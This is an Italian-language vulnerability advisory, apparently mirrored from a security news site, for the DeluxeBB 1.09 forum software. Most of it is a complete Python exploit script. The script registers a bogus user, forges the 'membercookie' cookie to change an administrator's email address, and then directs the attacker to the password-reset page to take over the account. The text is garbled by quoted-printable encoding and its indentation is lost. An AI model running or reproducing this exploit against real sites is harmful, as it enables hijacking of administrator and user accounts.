http://www.opencosmo.com=0D 
http://www.opencosmo.com/news.php?readmore=21=0D 
=0D
###################################################=0D
=0D
DeluxeBB E-Mail Address Change Security Bypass=0D
Crediti: Nexen=0D
Applicazione: DeluxeBB=0D
Versione: 1.09=0D
Impatto: Security Bypass=0D
Rischio: [3/5]=0D
=0D
Exploit: #!/usr/bin/python=0D
#-*- coding: iso-8859-15 -*-=0D
'''=0D
_ __ _____ _____ _ __=0D
| '_ \ / _ \ \/ / _ \ '_ \=0D
| | | | __/> < __/ | | |=0D
|_| |_|\___/_/\_\___|_| |_|=0D
=0D
------------------------------------------------------------------------------------------------=0D
=C2=A7 DeluxeBB 0day Remote Change Admin's credentials =C2=A7=0D
------------------------------------------------------------------------------------------------=0D
nexen=0D
------------------------------------------------------------------------------------------------=0D
PoC / Bug Explanation:=0D
When you update your profile,=0D
DeluxeBB execute a vulnerable query:=0D
=0D
$db->unbuffered_query("UPDATE ".$prefix."users SET email='$xemail', msn='$xmsn', icq='$xicq', ... WHERE (username='$membercookie')");=0D
=0D
So, editing cookie "membercookie" you can change remote user's email.=0D
=0D
Enjoy ;)=0D
------------------------------------------------------------------------------------------------=0D
=0D
'''=0D
=0D
=0D
import httplib, urllib, sys, md5=0D
from random import randint=0D
print "\n########################################################################################"=0D
print " DeluxeBB <= 1.09 Remote Admin's/User's Email Change "=0D
print " "=0D
print " Vulnerability Discovered By Nexen "=0D
print " Greetz to The:Paradox that Coded the Exploit. "=0D
print " "=0D
print " Usage: "=0D
print " %s [Target] [VictimNick] [Path] [YourEmail] [AdditionalFlags] " % (sys.argv[0])=0D
print " "=0D
print " Additional Flags: "=0D
print " -id34 -passMypassword -port80 "=0D
print " "=0D
print " Example: "=0D
print " python %s 127.0.0.1 admin /DeluxeBB/ me@it.com -port81 " % (sys.argv[0])=0D 
print " "=0D
print "########################################################################################\n"=0D
if len(sys.argv)<=4: sys.exit()=0D
else: print "[.]Exploit Starting."=0D
=0D
target = sys.argv[1]=0D
admin_nick = sys.argv[2]=0D
path = sys.argv[3]=0D
real_email = sys.argv[4]=0D
=0D
botpass = "the-new-administrator"=0D
rand = randint(1, 99999)=0D
dn1 = 0=0D
dn2 = 0=0D
dn3 = 0=0D
=0D
try:=0D
for line in sys.argv[:]:=0D
if line.find('-pass') != -1 and dn1 == 0:=0D
upass = line.split('-pass')[1]=0D
dn1 = 1=0D
elif line.find('-pass') == -1 and dn1 == 0:=0D
upass = ""=0D
if line.find('-id') != -1 and dn2 == 0:=0D
userid = line.split('-id')[1]=0D
dn2 = 1=0D
elif line.find('-id') == -1 and dn2 == 0:=0D
userid = ""=0D
=0D
if line.find('-port') != -1 and dn3 == 0:=0D
port = line.split('-port')[1]=0D
dn3 = 1=0D
elif line.find('-port') == -1 and dn3 == 0:=0D
port = "80"=0D
except:=0D
sys.exit("[-]Some error in Additional Flag.")=0D
if upass=="" and userid != "" or userid == "" and upass != "":=0D
print "[-]Bad Additional flags -id -pass given, ignoring them."=0D
upass=""=0D
userid=""=0D
############################################################################################Trying to connect.=0D
try:=0D
conn = httplib.HTTPConnection(target,port)=0D
conn.request("GET", "")=0D
except: sys.exit("[-]Cannot connect. Check Target.")=0D
############################################################################################Registering a new user if id or upass not defined=0D
try:=0D
conn = httplib.HTTPConnection(target,port)=0D
if upass == "" or userid == "":=0D
conn.request("POST", path + "misc.php?sub=register", urllib.urlencode({'submit': 'Register','name': 'th331337.%d' % (rand) , 'pass': botpass,'pass2': botpass,'email': 'root%d@yoursystemgotpowned.it' % (rand) }), {"Accept": "text/plain","Content-type": "application/x-www-form-urlencoded"})=0D 
response = conn.getresponse()=0D
cookies = response.getheader('set-cookie').split(";")=0D
#print "\n\nth331337.%d \n\nthe-new-administrator" % (rand)=0D
print "[.]Registering a new user. -->",response.status, response.reason=0D
conn.close()=0D
############################################################################################Getting memberid in Cookies=0D
for line in cookies[:]:=0D
if line.find('memberid') != -1:=0D
mid = line.split('memberid=')[1]=0D
############################################################################################Isset like starts=0D
try: mid=0D
except NameError: sys.exit("[-]Can't Get \"memberid\". Failed. Something has gone wrong. If you have not done yet, you may have to register manually and use flags -id -pass")=0D
except AttributeError:=0D
sys.exit("[-]AttributeError Check your Target/path.")=0D
############################################################################################Doing some Md5=0D
if upass=="" or userid=="":=0D
hash = md5.new()=0D
hash.update(botpass)=0D
passmd5 = hash.hexdigest()=0D
else:=0D
hash = md5.new()=0D
hash.update(upass)=0D
passmd5 = hash.hexdigest()=0D
mid = userid=0D
############################################################################################Updating "victim" email in Profile=0D
conn = httplib.HTTPConnection(target,port)=0D
conn.request("POST", path+"cp.php?sub=settings", urllib.urlencode({'submit': 'Update','xemail': real_email}), {"Accept": "text/plain","Cookie": "memberid="+mid+"; membercookie="+admin_nick+";memberpw="+passmd5+";" ,"Content-type": "application/x-www-form-urlencoded"})=0D
response = conn.getresponse()=0D
print "[.]Changing \""+admin_nick+"\" Email With \"" + real_email + "\" -->",response.status, response.reason=0D
conn.close()=0D
print "[+]All Done! Email changed!!!\n\n You can reset \""+admin_nick+"\" password here -> "+target+path+"misc.php?sub=lostpw :D\n\n Have Fun =)\n"=0D
=0D
Soluzione: Nessuna soluzione disponibile. Scrivere all'amministratore per aggiungere questa informazione.